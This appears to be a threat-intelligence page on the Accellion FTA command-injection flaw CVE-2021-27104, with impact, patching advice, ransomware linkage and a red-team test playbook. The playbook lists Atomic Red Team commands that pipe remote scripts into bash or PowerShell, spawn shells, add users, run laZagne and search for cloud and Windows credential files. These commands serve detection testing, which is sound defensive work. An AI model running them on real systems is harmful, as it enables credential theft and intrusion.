CVE-2021-27104
Overview
This vulnerability is a remote OS command injection affecting Accellion FTA versions 9_12_370 and earlier. The root cause lies in insufficient input validation of crafted POST requests sent to multiple administrative endpoints, allowing arbitrary command execution. The flaw resides in the web application's request handling logic for admin-level API paths, which fails to properly sanitize user-supplied input before passing it to the underlying system shell.
Vulnerability Description
Accellion FTA 9_12_370 and earlier is affected by OS command execution via a crafted POST request to various admin endpoints. The fixed version is FTA_9_12_380 and later.
Impact
An unauthenticated attacker can execute arbitrary operating system commands remotely on affected Accellion FTA servers by sending crafted POST requests. This enables full system compromise including data theft, system manipulation, and potential lateral movement within the network. The attacker gains control at the OS level without requiring valid credentials or user interaction, leading to severe operational disruption and data breach risks for organizations using vulnerable versions.
Solution
Upgrade Accellion FTA to version 9_12_380 or later as specified in the vendor advisory available at https://www.accellion.com/products/fta/. The vendor has addressed the command injection flaw in this release. Follow the official Accellion patching instructions to apply the update. No alternative workarounds are documented; prompt patching is recommended to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Accellion's File Transfer Appliance (FTA) stems from improper handling of user inputs, specifically allowing for OS command execution through crafted POST requests directed at various administrative endpoints. This flaw arises from insufficient input validation, enabling an attacker to inject arbitrary commands into the system. When the application processes these requests, it can execute the injected commands with the privileges of the web server, potentially leading to unauthorized access to sensitive data, system manipulation, or even complete system compromise. The affected versions, specifically those prior to FTA_9_12_380, are particularly vulnerable due to this oversight in input sanitization.
Attack vectors for this vulnerability are primarily web-based, where an attacker can exploit the flaw by sending specially crafted requests to the administrative interfaces of the FTA. These requests can be designed to execute commands that may manipulate the server environment, access sensitive files, or alter configurations. Exploitation scenarios could include an attacker gaining remote shell access, allowing them to execute further malicious commands, install backdoors, or exfiltrate data. Given the nature of file transfer appliances, which often handle sensitive information, the potential for data breaches and unauthorized access is significant. Furthermore, the ease of crafting such requests makes this vulnerability particularly dangerous, as it lowers the barrier for exploitation.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on the Accellion FTA for secure file transfers. The high CVSS score of 9.8 indicates a critical risk, suggesting that successful exploitation could lead to significant data breaches, loss of confidentiality, and potential financial repercussions. Organizations may face regulatory scrutiny, reputational damage, and operational disruptions as a result of a successful attack. Additionally, the potential for attackers to leverage this vulnerability to pivot to other systems within the network amplifies the risk, as it could lead to a broader compromise of the organization's IT infrastructure.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Accellion FTA to the latest version is crucial, as the vendor has released patches to address this specific issue. Organizations should also conduct routine security assessments and penetration testing to identify any potential vulnerabilities in their systems. Implementing web application firewalls (WAFs) can help filter out malicious requests before they reach the application layer. Additionally, monitoring logs for unusual activity, such as unexpected command executions or unauthorized access attempts, can provide early warning signs of exploitation attempts. Educating staff about the risks associated with insecure file transfer practices and promoting a culture of security awareness can further bolster defenses against such vulnerabilities.
In conclusion, the vulnerability present in Accellion's File Transfer Appliance poses a significant threat to organizations that utilize this technology for secure file transfers. The potential for OS command execution through crafted requests highlights the importance of robust input validation and secure coding practices. By understanding the technical details, attack vectors, real-world implications, and effective detection and mitigation strategies, organizations can better protect themselves against this critical vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has identified a marked escalation in the exploit prediction scoring for CVE-2021-27104, with the EPSS rising sharply to place this vulnerability in the 0.99th percentile of exploit likelihood. This surge reflects an accelerating trend in attacker interest and potential weaponization, particularly given the confirmed association with the Clop ransomware group’s campaigns. While no new technical exploit details have surfaced, the rapid increase in EPSS and ransomware linkage signals heightened operational activity targeting Accellion FTA deployments. For defenders, this shift underscores an urgent need to reassess exposure and monitoring strategies, as the elevated threat level indicates a growing probability of successful exploitation attempts in the near term. Consequently, the risk posture for organizations relying on affected Accellion versions has intensified, warranting increased vigilance despite the absence of fresh exploit code disclosures.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Accellion | Fta | All |
cpe:2.3:a:accellion:fta:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Cobalt Strike, PowerShell Empire, TinyMet (1254 known victims)
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
44%
|
High | High | |
| CAPEC-6 | Argument Injection |
43%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-27104 |
| accellion.com |
GitHub CVE
x_refsource_MISC
|
https://www.accellion.com/products/fta/ |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/accellion/CVEs/blob/main/CVE-2021-27104.txt |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-27104 |